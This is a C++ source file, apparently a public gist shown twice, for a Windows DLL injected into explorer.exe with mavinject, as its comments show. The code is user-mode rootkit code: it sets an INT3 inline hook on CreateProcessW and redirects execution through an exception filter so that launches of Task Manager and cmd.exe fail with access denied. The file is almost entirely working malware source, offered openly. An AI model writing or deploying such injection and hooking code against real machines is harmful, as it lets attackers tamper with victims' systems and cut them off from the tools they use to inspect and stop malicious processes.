gavz/Injectable.cpp

## Injectable.cpp
#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
// mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
//

BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
	DWORD dwOldProt = 0;
	if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
		return FALSE;

	MoveMemory(fpFunc, b, size);

	return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
}


VOID HookFunction(VOID) {
	fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
	if (fpCreateProcessW == NULL) {
		return;
	}

	bSavedByte = *(LPBYTE)fpCreateProcessW;

	const BYTE bInt3 = 0xCC;
	if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
		ExitThread(0);
	}
}

BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {

	if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL ||
		wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
		SetLastError(ERROR_ACCESS_DENIED);
		return FALSE;
	}

	if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
		ExitThread(0);
	}

	BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);

	HookFunction();
	return b;
}

LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
	if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
		lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;

	return EXCEPTION_CONTINUE_EXECUTION;
}


BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
		::MessageBoxA(NULL,"Boom!","Injected",0);
		HookFunction();
		break;
	}

	return TRUE;
}
	#include <windows.h>
	#include <stdio.h>


	FARPROC fpCreateProcessW;
	BYTE bSavedByte;

	// Blog Post Here:
	// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
	// tasklist \| findstr explore.exe
	// mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
	//

	BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
	DWORD dwOldProt = 0;
	if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
	return FALSE;

	MoveMemory(fpFunc, b, size);

	return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
	}


	VOID HookFunction(VOID) {
	fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
	if (fpCreateProcessW == NULL) {
	return;
	}

	bSavedByte = *(LPBYTE)fpCreateProcessW;

	const BYTE bInt3 = 0xCC;
	if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
	ExitThread(0);
	}
	}

	BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {

	if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL \|\|
	wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
	SetLastError(ERROR_ACCESS_DENIED);
	return FALSE;
	}

	if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
	ExitThread(0);
	}

	BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);

	HookFunction();
	return b;
	}

	LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
	if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
	lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;

	return EXCEPTION_CONTINUE_EXECUTION;
	}


	BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
	SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
	::MessageBoxA(NULL,"Boom!","Injected",0);
	HookFunction();
	break;
	}

	return TRUE;
	}